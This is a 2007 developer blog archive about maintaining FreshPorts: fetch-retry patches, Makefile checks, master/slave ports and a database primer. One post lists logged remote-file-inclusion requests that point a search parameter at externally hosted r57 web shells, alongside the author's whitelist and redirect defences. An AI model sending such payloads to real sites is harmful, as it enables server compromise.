FreshSource and FreshPorts back on the same server

October 7th, 2007

It was quite some time ago that I [finally] moved FreshPorts onto the new server. Today I moved FreshSource over too. Both websites use the same database instance. That is, each website is a different view of the same database.

Now that FreshSource is over here, we should be able to start doing a lot of things we’ve been unable to do before now. There was no reason for the delay. It just didn’t happen.

If you’re interested in getting FreshSource “filled out”, start now. All the FreshPorts source is online.

p5-Text-CSV_XS is missing

October 7th, 2007

Late last night, I wrote about a problem with virtual categories. I’ve been unable to reproduce the problem in test. But I did find the problem in production.

[dan@supernews:/usr/websites/freshports.org/scripts] $ touch ../dynamic/www.en.ports.categories
[dan@supernews:/usr/websites/freshports.org/scripts] $ sh process_www_en_ports_categories.sh
about to fetch: fetch -q -o /usr/websites/freshports.org/dynamic/caching/tmp/categories http://www.freebsd.org/cgi/cvsweb.cgi/~checkout~/www/en/ports/categories?rev=HEAD&content-type=text/plain
Can't locate Text/CSV_XS.pm in @INC (@INC contains: /usr/local/lib/perl5/5.8.8/BSDPAN /usr/local/lib/perl5/site_perl/5.8.8/mach /usr/local/lib/perl5/site_perl/5.8.8 /usr/local/lib/perl5/site_perl /usr/local/lib/perl5/5.8.8/mach /usr/local/lib/perl5/5.8.8 .) at categories_update_descriptions.pl line 23.
BEGIN failed--compilation aborted at categories_update_descriptions.pl line 23.
[dan@supernews:/usr/websites/freshports.org/scripts] $

Well. That seems to be quite a letdown. Who owns that file? Let me check test:

$ locate CSV_XS.pm
/usr/local/lib/perl5/site_perl/5.8.8/mach/Text/CSV_XS.pm
$ pkg_info -W /usr/local/lib/perl5/site_perl/5.8.8/mach/Text/CSV_XS.pm
/usr/local/lib/perl5/site_perl/5.8.8/mach/Text/CSV_XS.pm was installed by package p5-Text-CSV_XS-0.23

That means we are missing p5-Text-CSV_XS in production. That is easy enough to add in.

Done. Fixed. Let’s wait for the next commit.

BTW: I noticed that www/en/ports/categories has a few slight problems:

tcl - present, but no ports exist in this category
tk - same as above
geography - should be present, but is not
spanish - same as above

The first two issues arose with revision 1.34.

I sent in a patch for the last two issues. That in itself will be a good test of the above fix to FreshPorts.

Virtual categories get no respect

October 6th, 2007

After all I’ve written about virtual categories, it seems I still don’t have them right.

The code is there:

$ grep -l www/en/ports/categories *
process_www_en_ports_categories.sh
special_processing_files.pm

but things are still not being updated. If you look at the list of categories, sort by Description, you will find several with a description of “This is a virtual category. No description is available.”

I’ll have to find out why. The processing of each cvs-all email is logged and kept for quite some time (I have logs dating back to Nov 2006) just in case I need to review something like this. Something isn’t quite right. I’ll find out what.

Odd way to break in

October 2nd, 2007

Some people like to break into systems. Some like to find vulnerabilities. The good ones will tell you about the vulnerability so you can fix it. Many won’t.

Then there are the script kiddies. They don’t know much. They know how to run scripts.

Lately, I’ve been seeing these requests to the FreshPorts website:

/search.php?stype=http://0x00013.50webs.org/tesgcc.txt?
/search.php?stype=http://0x0134.lan.io/pb.php?
/search.php?stype=http://0xg3458.hub.io/pb.php?
/search.php?stype=http://amygirl.3-hosting.net/cs.txt?
/search.php?stype=http://amygirl.siteburg.com/images/cs.txt?
/search.php?stype=http://amygirl.webs.io/pb.php?
/search.php?stype=http://amyru.h18.ru/images/cs.txt?
/search.php?stype=http://andravarldar.se/cmd?
/search.php?stype=http://tarcisiobr.kit.net/r57.txt?
/search.php?stype=http://users2.TitanicHost.com/ninagirl/pb.txt?
/search.php?stype=http://www.by-kaos.org/r57.txt?
/search.php?stype=http://www.etriple.com/sc/comandi/r57.txt?
/search.php?stype=http://www.evilc0der.com/r57.txt?
/search.php?stype=http://www.oxred.kit.net/bye.txt?
/search.php?stype=http://www.ss3s.org/r57.txt?
/search.php?stype=http://wwww.ypu.com/r57.txt?
/search.php?stype=http://x0.741.com/pb.txt?

What’s in these files? Something like this.

Where are they coming from? All over the place. Here is a list sorted by IP address.

As for these types of requests, I see them in the logs, I think about them. I know it’s not a problem because that particular field of the search results is well sanitized. Only certain values are accepted. If you supply a non-recognized value, you get told:

something terrible has happened!

That happens through code like this:

switch ($stype) {
   case SEARCH_FIELD_NAME:
   case SEARCH_FIELD_PACKAGE:
   case SEARCH_FIELD_LATEST_LINK:
   case SEARCH_FIELD_SHORTDESCRIPTION:
   case SEARCH_FIELD_LONGDESCRIPTION:
   case SEARCH_FIELD_DEPENDS_BUILD:
   case SEARCH_FIELD_DEPENDS_LIB:
   case SEARCH_FIELD_DEPENDS_RUN:
   case SEARCH_FIELD_DEPENDS_ALL:
   case SEARCH_FIELD_MAINTAINER:
   case SEARCH_FIELD_COMMITTER:
   case SEARCH_FIELD_PATHNAME:
   case SEARCH_FIELD_COMMITMESSAGE:
   # all is well.  we have a valid value.
      break;

   default:
      # bad value.
      # ERROR
      syslog(LOG_ERR, 'bad search string: ' . $_SERVER['QUERY_STRING']);
      die('something terrible has happened!');
}

That’s sufficient for what I needed. But now I’m getting annoyed. I’ve been redirecting the IP addresses elsewhere, but I’ve given up on that now. I had been doing something like this:

RewriteEngine On
RewriteCond %{REMOTE_ADDR} 59.56.116.171   [OR]
RewriteCond %{REMOTE_ADDR} 172.188.236.232 [OR]
RewriteCond %{REMOTE_ADDR} 202.101.107.120 [OR]
...
RewriteCond %{REMOTE_ADDR} 90.128.89.206   [OR]
RewriteCond %{REMOTE_ADDR} 82.42.160.16    [OR]
RewriteCond %{REMOTE_ADDR} 194.104.99.10
RewriteRule .* http://news.example.org/odd-way-to-break-in/ [R=permanent]

This has the disadvantage of requiring manual intervention to amend the list and tapping Apache on the shoulder. It is precise in that it redirects the kiddies if they try accessing http://www.freshports.org/ . I had thought of blocking the IP addresses from the entire server (all websites) by using a cronjob and a firewall rule (similar to how I dealt with an odd DoS attack).

This morning, I decided I’d try something else. I’d redirect from within the code. Hence this patch:

if (substr($stype, 0, 7) === 'http://') {
   # redirect their ass
   # ask for a 301 explicitly; a bare Location header sends a 302
   header('Location: http://news.freshports.org/2007/10/02/odd-way-to-break-in/', true, 301);
   exit;
}

This keeps them away from the server, and has the following advantages:

  • automatic - I don’t do anything
  • Produces a 301 in the logs - they don’t get anywhere near the website

So much better…

when is a Makefile not a Makefile?

September 14th, 2007

This is not good:

$ file -kb /usr/home/dan/ports/www/p5-HTTP-Size/Makefile
Apple Old Partition data block size: 20069, first type: ${PORTSDIR}/www/p5-HTML-SimpleL, name: I \, number of blocks: 1953460746,

It should read:

$ file -kb /usr/home/dan/ports/sysutils/bacula-server/Makefile
ASCII English text

Why do I care? The file in question has been fetched from the FreeBSD repository (via cvsweb). I need to ensure it’s not an HTML error file. Or more correctly, that it is an ASCII file, not an HTML file. I want to know that I’ve fetched a proper result.

I used to do this:

sub LooksLikeAMakefile($) {
    my $Makefile = shift;
    my $Result   = 1;

    my $filetype = `file -b $Makefile`;
    chomp($filetype);

    print "$filetype\n";

    if (index($filetype, 'HTML', 0) != -1) {
        print "nope, that's HTML, not a Makefile as far as I'm concerned....\n";
        $Result = 0;
    }

    return $Result;
}

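That usually worked. It rejects the file if HTML appears anywhere in the output of the file command. The first example above trips this check because the output happens to contain p5-HTML-SimpleL, so a perfectly good Makefile is treated as HTML. Here is the patch I’m going to use instead: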

sub LooksLikeAMakefile($) {
    my $Makefile = shift;
    my $Result   = 1;

    my $Command = "file -b $Makefile";

    my $filetype = `$Command`;
    chomp($filetype);

    print "\n$Command gives:\n";
    print "$filetype\n\n";

    # look for HTML at the start of the file output
    my $index = index($filetype, 'HTML', 0);
    print "index result " . $index . "\n";

    if ($index == 0) {
        print "nope, that's HTML, not a Makefile as far as I'm concerned....\n";
        $Result = 0;
    }

    return $Result;
}

This code is on my development server now.

What is the difference? I’m now checking that the HTML appears at the start of the file output, not just somewhere within the output. And I’m printing a bit more debugging output.
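The difference between the two checks can be sketched outside Perl. The following Python is only an illustration, not the FreshPorts code: the function names are made up, the first two descriptions are copied from the file output above, and the third is an assumed example of what file -b might print for an HTML error page.

```python
def html_anywhere(filetype: str) -> bool:
    """Old check: reject when 'HTML' appears anywhere in the description."""
    return "HTML" in filetype


def html_at_start(filetype: str) -> bool:
    """New check: reject only when the description begins with 'HTML'."""
    return filetype.startswith("HTML")


# Description copied from the misdetected Makefile shown earlier.
misdetected = (
    "Apple Old Partition data block size: 20069, "
    "first type: ${PORTSDIR}/www/p5-HTML-SimpleL, name: I \\, "
    "number of blocks: 1953460746,"
)
plain = "ASCII English text"
html_page = "HTML document text"  # assumed output for an HTML error page

for description in (misdetected, plain, html_page):
    # Print (old verdict, new verdict) for each description.
    print(html_anywhere(description), html_at_start(description))
```

Only the first description changes its verdict: the old check rejects it, the new one accepts it.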

vuxml - fix

September 13th, 2007

This isn’t so much a fix for the vuxml problem mentioned previously as it is a fix for properly detecting and reporting fetch errors. The patch is pretty simple:

$ cvs di -u utilities.pm
Index: utilities.pm
===================================================================
RCS file: /home/repositories/freshports-1/scripts/utilities.pm,v
retrieving revision 1.16
diff -u -r1.16 utilities.pm
--- utilities.pm        13 Sep 2007 13:01:41 -0000      1.16
+++ utilities.pm        13 Sep 2007 13:43:33 -0000
@@ -74,9 +74,9 @@
                my $command = "sh $FreshPorts::Config::scriptpath/fetch-cvs-file.sh \
                                    $URL $SRCDIR $FILE $REVISION $SUFFIX 2>&1";
                print "about to fetch = '$command'";
                my $FetchResults = `$command`;
-               $result = $?;
-#              print "fetch result = $result\n";
-               if (($result >> 8)) {
+               my $code = $?;
+               print "fetch result = $code\n";
+               if (($code >> 8)) {
                        #
                        # This might be a nice place to retry a fetch, or send an email
                        #

It is not shown, but $result is the value returned by this function. It was being overwritten with the exit status of the fetch command. With this change, we use $code instead of $result for the fetch, thereby ensuring that this code segment works correctly:

    my $result = 0;

    my $FetchAttempts = $FreshPorts::Config::Fetch_Retry_Limit;

    while ($FetchAttempts) {
...
    # if we succeeded in our fetch..
    if ($FetchAttempts) {
        $result = 1;
    }

    return $result;

I’ll be putting this code into production soon.
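The effect of reusing the variable can be sketched in Python. This is a rough model under assumptions, not the real utilities.pm: the function names are hypothetical, run_fetch stands in for the backtick call and returns a Perl-style wait status (exit code in the high byte), and a successful fetch is assumed to leave the loop.

```python
from typing import Callable


def fetch_buggy(run_fetch: Callable[[], int], attempts: int) -> int:
    """Models the old code: the wait status is stored in the return value."""
    result = 0
    while attempts:
        result = run_fetch()        # clobbers the value we intend to return
        if result >> 8:             # non-zero exit code: this attempt failed
            attempts -= 1
        else:
            break                   # assumed: success ends the loop
    if attempts:
        result = 1
    return result


def fetch_fixed(run_fetch: Callable[[], int], attempts: int) -> int:
    """Models the patch: the wait status lives in its own variable."""
    result = 0
    while attempts:
        code = run_fetch()
        if code >> 8:
            attempts -= 1
        else:
            break
    if attempts:
        result = 1
    return result


def always_fails() -> int:
    return 1 << 8                   # wait status of a command that did "exit 1"


print(fetch_buggy(always_fails, 5))   # leftover wait status, not 0
print(fetch_fixed(always_fails, 5))   # 0, the intended failure value
print(fetch_fixed(lambda: 0, 5))      # 1, success
```

When every attempt fails, the old version hands back the last wait status instead of 0. Any caller that treats a non-zero return as success would then carry on as if the fetch had worked. Whether the callers do that is not shown here.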

vuxml configuration still not right

September 13th, 2007

This morning portaudit told me I needed to upgrade PHP5 on a few servers. Again, I checked FreshPorts to see if a fix was in. Apparently it was. Unfortunately, it was wrong.

Checking the version of vuln.xml in the ports tree, I found:

$ grep '$FreeBSD' ports/security/vuxml/vuln.xml
$FreeBSD: ports/security/vuxml/vuln.xml,v 1.1416 2007/09/11 19:40:02 remko Exp $

It should have 1.1417.

Checking the processing log of that commit, I can see that the system had trouble fetching the new vuln.xml file via cvsweb. The script tried 5 times to grab the file between 01:50:44 and 01:51:26. That’s not a long period of time.

This is puzzling because cvsweb has a direct NFS mount of repoman (the main cvs repository), so it should see a new revision as soon as it is committed. If a fetch by FreshPorts fails, well, I don’t know why that happens.

I have a patch that’s been sitting on my development server for a while:

$ cvs di -uN utilities.pm
Index: utilities.pm
===================================================================
RCS file: /home/repositories/freshports-1/scripts/utilities.pm,v
retrieving revision 1.15
diff -u -r1.15 utilities.pm
--- utilities.pm        27 Jun 2007 02:40:26 -0000      1.15
+++ utilities.pm        13 Sep 2007 12:21:20 -0000
@@ -68,7 +68,7 @@

   my $result = 0;

-   my $FetchAttempts = 5;
+   my $FetchAttempts = $FreshPorts::Config::Fetch_Retry_Limit;

   while ($FetchAttempts) {
      my $command = "sh $FreshPorts::Config::scriptpath/fetch-cvs-file.sh $URL $DESTDIR \
                                    $SRCDIR $FILE $REVISION $SUFFIX 2>&1";
@@ -89,7 +89,7 @@

      Sys::Syslog::syslog('warning', \
              "sleeping after fetch failed for ($DESTDIR $SRCDIR $FILE)");
      print "fetch failed, sleeping...\n";
-      sleep 10;
+     sleep $FreshPorts::Config::Fetch_Sleep_Time;
       $FetchAttempts--;

    } else {

With this patch, I can manually configure the number of fetch retries and the sleep interval between attempts. At present, I’m using this on my development server:

$ grep Fetch config.pm
$FreshPorts::Config::Fetch_Retry_Limit = 10;
$FreshPorts::Config::Fetch_Sleep_Time  = 120;

This strategy will sleep for 2 minutes after a failed fetch. It will attempt to fetch 10 times.
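To put numbers on that, here is a small Python sketch of the retry loop. It is a model rather than the production Perl: the function and parameter names are hypothetical, and the sleep function is injectable so the example runs instantly. It assumes, as the diff above suggests, that the script sleeps after every failed attempt, including the last one.

```python
import time
from typing import Callable

FETCH_RETRY_LIMIT = 10   # mirrors $FreshPorts::Config::Fetch_Retry_Limit
FETCH_SLEEP_TIME = 120   # mirrors $FreshPorts::Config::Fetch_Sleep_Time, in seconds


def fetch_with_retries(
    fetch_once: Callable[[], bool],
    retry_limit: int = FETCH_RETRY_LIMIT,
    sleep_time: int = FETCH_SLEEP_TIME,
    sleep: Callable[[float], object] = time.sleep,
) -> bool:
    """Try fetch_once up to retry_limit times, sleeping after each failure."""
    attempts = retry_limit
    while attempts:
        if fetch_once():
            return True
        sleep(sleep_time)
        attempts -= 1
    return False


# Record the requested naps instead of really sleeping.
naps = []
ok = fetch_with_retries(lambda: False, sleep=naps.append)
print(ok, len(naps), sum(naps))   # False 10 1200

old_naps = []
fetch_with_retries(lambda: False, retry_limit=5, sleep_time=10, sleep=old_naps.append)
print(sum(old_naps))              # 50
```

Under these assumptions the new settings keep trying for up to 1200 seconds (20 minutes) of sleep time, against 50 seconds with the old hard-coded values.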

There is another problem here. Why did FreshPorts not error out when the fetch failed? The commit should have been marked as requiring a refresh and the processing of the security/vuxml/vuln.xml file should never have occurred. In which case, I would have noticed the unrefreshed port in the morning, and manually refreshed it, thus triggering the usual vuxml processing.

The problem did not occur on my development server (which has the above code) located in Jupiter, Florida. Nor did it occur on the BETA server in New York City. This may have been a local network issue affecting only the production server (in San Jose).

I’ll move the above patch into production and see if the problem occurs again. I’ll also do some more testing to make sure a port is marked as refresh needed if a fetch failure occurs.

vuxml - missing configuration items

September 11th, 2007

After my overnight security report audit came in, I noticed that Apache needed to be upgraded. I went to FreshPorts to see if a fix had been committed. While there, I noticed a lack of vuxml skulls against the latest versions of Apache. Checking the BETA website, I saw it was correctly marked. More digging found the problem. In the process, I improved some error reporting in the scripts so that this problem should be brought to my attention much sooner.

Things should be back to normal now.

master / slave relationships

August 25th, 2007

As reported by sem@, there is a problem with the display of master/slave relationships within FreshPorts. The relationship is stored in the ports table, with the master_port attribute being a pointer to the master port. This text field typically has values such as this:

freshports.org=#   SELECT DISTINCT(master_port)
freshports.org-#     FROM ports_active
freshports.org-# where master_port <> ''
freshports.org-# AND  master_port not like '/usr/home/dan/%'
freshports.org-# ORDER BY master_port
freshports.org-#    LIMIT 10;
       master_port
--------------------------
 archivers/unrar
 audio/aylet
 audio/festalon
 audio/festvox-us1-mbrola
 audio/gbsplay
 audio/gqmpeg
 audio/mbrola
 audio/napster
 audio/scrobbler
 audio/timidity++
(10 rows)

freshports.org=#

The query to find any slave ports of a given port is:

SELECT id          AS slave_port_id,
       name        AS slave_port_name,
       category_id AS slave_category_id,
       category    AS slave_category_name
  FROM ports_active
 WHERE master_port = 'sysutils/bacula-server'
ORDER BY slave_category_name, slave_port_name

Which, on my development server at home, for sysutils/bacula-server gives:

 slave_port_id | slave_port_name | slave_category_id | slave_category_name
---------------+-----------------+-------------------+---------------------
         13986 | bacula-client   |                20 | sysutils
(1 row)

The problem is: bacula-server is not listing bacula-client as a slave port. For that matter, in production, bacula-client isn’t listing bacula-server as its master port either. Strange. Very strange. It must be something very simple that has gone wrong here. This has worked in the past.

FreshPorts determines the MASTERPORT through make -V magic. Something like this:

[dan@ngaio:~/ports/sysutils/bacula-client] $ make -V MASTERPORT \
PORTSDIR=~/ports LOCALBASE=/nonexistentlocal X11BASE=/nonexistentx
sysutils/bacula-server
[dan@ngaio:~/ports/sysutils/bacula-client] $

This magic is accomplished with this patch:

$ less ~/bin/bsd.port.mk.master-slave-patch
--- bsd.port.mk 10 Jun 2004 07:30:19 -0000      1.491
+++ bsd.port.mk 22 Jun 2004 13:48:33 -0000
@@ -913,6 +913,16 @@

 MASTERDIR?=    ${.CURDIR}

+# Try to determine if we are a slave port.  These variables are used by
+# FreshPorts and portsmon, but not yet by the ports framework itself.
+.if ${MASTERDIR} != ${.CURDIR}
+IS_SLAVE_PORT?=        yes
+MASTERPORT?=   ${MASTERDIR:C/[^\/]+\/\.\.\///:C/[^\/]+\/\.\.\///:C/^.*\/([^\/]+\/[^\/]+)$/\1/}
+.else
+IS_SLAVE_PORT?=        no
+MASTERPORT?=
+.endif
+
 # If they exist, include Makefile.inc, then architecture/operating
 # system specific Makefiles, then local Makefile.local.
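What the MASTERPORT line does is easier to see when written out step by step. The Python below is an approximation of the three :C substitutions in the patch, not a replacement for them. The function name is made up, and the example MASTERDIR path is an assumption about what bacula-client sets.

```python
import re


def master_port(masterdir: str) -> str:
    """Approximate the three :C modifiers applied to MASTERDIR."""
    path = masterdir
    # Steps 1 and 2: each pass removes the first "component/../" pair.
    for _ in range(2):
        path = re.sub(r"[^/]+/\.\./", "", path, count=1)
    # Step 3: keep only the last two components, i.e. category/port.
    return re.sub(r"^.*/([^/]+/[^/]+)$", r"\1", path, count=1)


# Assumed MASTERDIR for sysutils/bacula-client in my ports tree.
example = "/usr/home/dan/ports/sysutils/bacula-client/../../sysutils/bacula-server"
print(master_port(example))   # sysutils/bacula-server
```

With that input the result matches the make -V MASTERPORT output shown earlier.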

So something, somewhere has allowed this information to be wrong. A few days ago, I did notice that my cvsup crontab was going wrong and was not correctly patching the file after the upgrade. Perhaps that was it.

Running a few commits manually shows that this is the problem: an unpatched Mk/*.

I’ll work on getting that fixed and then run a script to check for a master port for each port.

FreshPorts database primer

August 3rd, 2007

This is a starting introduction to the FreshPorts database. Hopefully it will prompt questions. Ask.

The key data component of FreshPorts is the commit. These are stored in the commit_log table. Each commit affects one or more files, known in the database as elements.

The elements table is a self-referencing table and represents the files and directories of the source repository. Here are a few entries from that table:

freshports.org=# select *, element_pathname(id) from element order by id limit 10;
 id |   name   | parent_id | directory_file_flag | status |        element_pathname
----+----------+-----------+---------------------+--------+--------------------------------
  1 | ports    |           | D                   | A      | /ports
  2 | editors  |         1 | D                   | A      | /ports/editors
  3 | yudit    |         2 | D                   | A      | /ports/editors/yudit
  4 | Makefile |         3 | F                   | A      | /ports/editors/yudit/Makefile
  5 | pkg      |         3 | D                   | A      | /ports/editors/yudit/pkg
  6 | DESCR    |         5 | F                   | D      | /ports/editors/yudit/pkg/DESCR
  7 | files    |         3 | D                   | A      | /ports/editors/yudit/files
  8 | md5      |         7 | F                   | D      | /ports/editors/yudit/files/md5
  9 | www      |         1 | D                   | A      | /ports/www
 10 | quanta   |         9 | D                   | D      | /ports/www/quanta
(10 rows)

freshports.org=#
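The self-referencing idea can be sketched in a few lines of Python. This is not how element_pathname() is implemented in the database (that function is not shown here). It is only a model of walking parent_id up to the root, using the ten rows above. The dictionary and function names are hypothetical.

```python
from typing import Dict, Optional, Tuple

# id -> (name, parent_id), copied from the query output above.
ELEMENTS: Dict[int, Tuple[str, Optional[int]]] = {
    1: ("ports", None),
    2: ("editors", 1),
    3: ("yudit", 2),
    4: ("Makefile", 3),
    5: ("pkg", 3),
    6: ("DESCR", 5),
    7: ("files", 3),
    8: ("md5", 7),
    9: ("www", 1),
    10: ("quanta", 9),
}


def pathname(element_id: int) -> str:
    """Build the full path by following parent_id until the root."""
    parts = []
    current: Optional[int] = element_id
    while current is not None:
        name, parent_id = ELEMENTS[current]
        parts.append(name)
        current = parent_id
    return "/" + "/".join(reversed(parts))


print(pathname(6))    # /ports/editors/yudit/pkg/DESCR
print(pathname(10))   # /ports/www/quanta
```

Each row only knows its own name and its parent. The full pathname is derived, not stored.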

To relate a commit to the files it touches, the commit_log_elements table is used.

Ports are just a special case of abstraction. The Ports table contains data taken from each Makefile for the port in question. For this, “make -V” is used.

Ports are also elements. Using the element ids from the above query, here are the ports that pertain to those elements:

freshports.org=# select id, element_id, category_id, short_description from ports
where element_id between 1 and 10;
 id | element_id | category_id |                 short_description
----+------------+-------------+----------------------------------------------------
  1 |          3 |           1 | Multi-lingual unicode text editor with TTF support
  2 |         10 |           2 | Comprehensive html/website development environment
(2 rows)

freshports.org=#

Some commits affect ports. This relationship is maintained in the commit_log_ports table.

The categories table is what you think it is:

freshports.org=# select id, element_id, name from categories order by name;
 id  | element_id |     name
-----+------------+---------------
  85 |     171607 | accessibility
  64 |            | afterstep
  88 |     159346 | arabic
  23 |        350 | archivers
  26 |        410 | astro
  25 |        386 | audio
  42 |       2710 | benchmarks
  36 |        869 | biology
  35 |        830 | cad
  39 |       1660 | chinese
  41 |       2191 | comms
  27 |        423 | converters
  32 |        582 | databases
  33 |        802 | deskutils
  10 |         84 | devel
  84 |     148762 | dns
   1 |          2 | editors
  63 |            | elisp
  22 |        245 | emulators
  54 |     118514 | finance
  47 |      16545 | french
  13 |        140 | ftp
   3 |         18 | games
 118 |            | geography
  44 |       3747 | german
  58 |            | gnome
 101 |            | gnustep
   4 |         29 | graphics
  96 |            | hamradio
  77 |            | haskell
  46 |      11329 | hebrew
  51 |     118517 | hungarian
  62 |            | ipv6
   6 |         39 | irc
  12 |        129 | japanese
  34 |        815 | java
  55 |            | kde
 117 |            | kld
  37 |       1109 | korean
  15 |        171 | lang
  66 |            | linux
  90 |            | lisp
  19 |        201 | mail
  16 |        176 | math
  45 |       6412 | mbone
   7 |         42 | misc
  52 |     118520 | multimedia
   8 |         50 | net
  95 |     229588 | net-im
  92 |     173566 | net-mgmt
  98 |     236506 | net-p2p
  17 |        179 | news
  76 |            | offix
  40 |       2143 | palm
  93 |            | paralell
  68 |            | parallel
  89 |            | pear
  94 |            | perl
  59 |            | perl5
  87 |            | php
  50 |      58316 | picobsd
  69 |            | plan9
  82 |     148764 | polish
 111 |     265340 | ports-mgmt
  53 |     118523 | portuguese
  24 |        360 | print
  57 |            | python
  74 |            | ruby
  97 |            | rubygems
  31 |        577 | russian
  83 |            | scheme
  48 |      56065 | science
   5 |         34 | security
  29 |        465 | shells
 100 |            | spanish
  20 |        218 | sysutils
  70 |            | tcl80
  72 |            | tcl81
  71 |            | tcl82
  60 |            | tcl83
  80 |            | tcl84
  18 |        188 | textproc
  78 |            | tk42
  73 |            | tk80
  61 |            | tk82
  65 |            | tk83
  79 |            | tk84
  75 |            | tkstep80
  49 |      57265 | ukrainian
  11 |         94 | vietnamese
  56 |            | windowmaker
   2 |          9 | www
  21 |        231 | x11
  28 |        428 | x11-clocks
 115 |     278073 | x11-drivers
  30 |        516 | x11-fm
  38 |       1229 | x11-fonts
  43 |       3321 | x11-servers
  91 |     171611 | x11-themes
   9 |         55 | x11-toolkits
  14 |        147 | x11-wm
  81 |            | xfce
  67 |            | zope
(103 rows)

freshports.org=#

You will notice that categories, like ports, have an element_id.

One of the key features of FreshPorts is the notification. Users select what they wish to monitor and add it to their watch list. Each entry on a watch list consists of a watch_list_id and an element_id.

freshports.org=# select * from watch_list_element limit 10;
 watch_list_id | element_id
---------------+------------
          4000 |        916
          4334 |     112921
          4334 |      90346
          4334 |      88170
          4334 |     101671
          3105 |      57670
          3105 |      13030
          3105 |      68999
          3105 |       2487
          3105 |      68994
(10 rows)

freshports.org=#

In turn, each watch list is owned by a user. Users can have multiple watch lists:

freshports.org=# select id, user_id, name from watch_list order by user_id limit 10;
  id   | user_id |  name
-------+---------+--------
 10276 |       1 | stuff
 10275 |       1 | things
  8609 |       2 | main
 10277 |       2 | other
  1247 |       3 | main
  1248 |       4 | main
  1249 |       5 | main
  1250 |       6 | main
  1251 |       7 | main
     4 |       9 | main
(10 rows)

freshports.org=#